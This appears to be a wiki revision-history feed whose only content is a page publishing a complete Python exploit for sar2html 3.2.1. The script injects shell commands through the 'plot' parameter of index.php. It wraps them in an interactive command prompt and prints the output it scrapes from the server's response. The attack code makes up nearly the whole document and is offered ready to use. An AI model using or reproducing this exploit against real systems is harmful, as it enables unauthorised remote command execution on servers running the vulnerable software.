https://pwnwiki.com/index.php?action=history&feed=atom&title=Sar2html_3.2.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Sar2html 3.2.1 遠程代碼執行漏洞 - Revision history
2026-04-21T01:42:50Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Sar2html_3.2.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1301&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2h..."
2021-04-09T08:45:24Z
<p>Created page with "==EXP== <pre> # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2h..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution<br />
# Date: 27-12-2020<br />
# Exploit Author: Musyoka Ian<br />
# Vendor Homepage:https://github.com/cemtan/sar2html <br />
# Software Link: https://sourceforge.net/projects/sar2html/<br />
# Version: 3.2.1<br />
# Tested on: Ubuntu 18.04.1<br />
<br />
#!/usr/bin/env python3<br />
<br />
import requests<br />
import re<br />
from cmd import Cmd<br />
<br />
url = input("Enter The url => ")<br />
<br />
class Terminal(Cmd):<br />
prompt = "Command => "<br />
def default(self, args):<br />
exploiter(args)<br />
<br />
def exploiter(cmd):<br />
global url<br />
sess = requests.session()<br />
output = sess.get(f"{url}/index.php?plot=;{cmd}")<br />
try:<br />
out = re.findall("<option value=(.*?)>", output.text)<br />
except:<br />
print ("Error!!")<br />
for ouut in out:<br />
if "There is no defined host..." not in ouut:<br />
if "null selected" not in ouut:<br />
if "selected" not in ouut:<br />
print (ouut)<br />
print ()<br />
<br />
if __name__ == ("__main__"):<br />
terminal = Terminal()<br />
terminal.cmdloop()<br />
</pre></div>
Pwnwiki